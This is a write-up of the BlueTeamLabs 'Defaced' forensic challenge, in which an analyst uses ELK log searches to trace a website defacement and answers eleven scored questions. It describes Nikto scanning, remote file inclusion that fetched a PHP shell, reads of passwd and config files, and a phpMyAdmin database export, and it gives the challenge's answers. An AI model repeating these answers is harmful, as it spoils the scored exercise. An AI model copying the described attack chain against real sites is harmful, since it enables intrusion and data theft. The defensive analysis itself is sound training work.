BlueTeamLabs: Defaced

Overview

In this challenge, we’ve been tasked with analyzing Apache logs to uncover what an attacker did before defacing the victim’s website. We’re given access to an ELK instance to perform our investigation.


Scenario

Mike is a young entrepreneur that recently started a pharmaceutical company online that supplies personal health products. As the business is growing at a rapid pace, Mike pressured the developers to create a website as quickly as possible and disregarded time-consuming security measures. Unsurprisingly, after the website went live it was defaced by a threat actor that also stole all the database records. Learning from this incident Mike took down the server and began security testing and investigation. He setup a forwarder to send server logs to a SIEM and used a file integrity monitoring solution to get alerts when files are modified on the server. You are provided with the alerts generated from the file integrity monitoring tool, stored on the Desktop as FIM1.JPG and FIM2.JPG. You also have screenshots of the website homepage before and after the compromise, saved as; Before.JPG and After.JPG.


Q1

As an analyst, you need to submit details to the CTI team. What is the signature left by the threat actor that compromised the website?

We’ve been provided with screenshots of the site before and after it was defaced.

The defaced webpage features the threat actor’s signature.

Defaced webpage

Answer Team ApashKirikiri2.0

Q2

The attacker deleted some files. What are they? (Alphabetical order based on filename)

Aside from the screenshots of the website, we’ve also been provided with screenshots of the FIM (File Integrity Monitor).

Checking these screenshots we can see the two files that were deleted.

FIM screenshot

Answer access_log, error_log

Q3

What is the scanner used by the attacker to identify the vulnerability?

Our briefing instructed us to frame our hunt between the dates of Feb 17th and Feb 19th, 2021, so we’ll start by restricting events to be within this timeframe.

Filtering for the date range

We’re looking for attacker activity so we’ll begin by analyzing POST requests for any suspicious activity.

Sorting events from oldest to newest helps us to get a clear picture of the activities performed by the attacker.

After scrolling through a little bit of noise we can see what appears to be the attacker’s first attempt at testing for vulnerabilities.

attacker seen testing for xss

This doesn’t tell us what tool the attacker is using though, so we’ll drop our POST request filter and start looking at more data.

Unfortunately, our logs don’t include User-Agents, which makes identifying the tool a bit more complicated.

We can start by searching for well-known tools in the data to see if we get lucky.

There don’t seem to be any results for Nmap, but Nikto pops up 50 hits.

Searching for requests containing the string 'nikto'

Answer Nikto

Q4

Which PHP page is vulnerable to Remote File Inclusion (RFI)?

To look for an RFI attack we’re going to be expecting to find a full URL within the request.

To filter for this we’ll search for any requests that contain https.

Filtering for requests that contain https

Unfortunately, so far our results are not what we’re looking for. Most of these results aren’t RFI attempts at all.

We can filter further for successful responses (response code 200) or scroll through the results.

Evidence of RFI

Answer getimagesonly.php

Q5

What is the IP address of the remote attacker?(3 points)

We discovered this in Q3 when we found evidence of XSS testing.

Answer 91.192.103.35

Q6

What is the name of the PHP shell?

We’ll adjust our filter now for the endpoint that is vulnerable to RFI (getimagesonly).

After adjusting our query it becomes clear that the attacker downloaded a shell from mediafire.com.

backdoor downloaded via RFI

Answer backdoor.jpg.php

Q7

The attacker downloaded the PHP shell from a file-hosting website. What is the name of the website?

We discovered this in the previous question.

Answer mediafire.com

Q8

What time was the first command executed through the PHP shell?(3 points)

Again we’ll adjust our query, this time we will filter for requests to the backdoor file.

requests to the backdoor file

Note: The answer expected is not the timestamp of the log entry but rather the timestamp within the message field of the log.

Answer 18/02/2021 17:12:44

Q9

Which config file does the attacker attempt to read using the command ‘cat’?

We can keep our existing filters and read through the various commands executed by the attacker.

Shortly after running the command in Q8, we can see the attacker read the passwd file, ran pwd, and enumerated /opt/lampp/htdocs before reading a config file with cat.

Initial command execution

Answer /opt/lampp/htdocs/MikePharmaSystem/config.php

Q10

At what time was the database dumped by the attacker?

The database doesn’t seem to be dumped via the backdoor, so we’ll remove that from our filters.

We’ll also adjust our timeframe for anything after the backdoor was uploaded (or there about).

Adjusting the timeframe of our investigation

Scrolling through the results we can see the attacker accessed phpmyadmin, which is often targeted by attackers.

Shortly after accessing phpmyadmin, we see a reference to phpmyadmin/db_structure.php, and, not long after that, we see the attacker access db_export.php.

attacker making requests a request to db_export.php

Answer 18/02/2021 17:14:59

Q11

The attacker exfiltrated the database records. What is the database name? (Just the name, without any extension)

We can see the name of the database in the query discussed in the previous question.

Answer Mike_Pharmaceuticals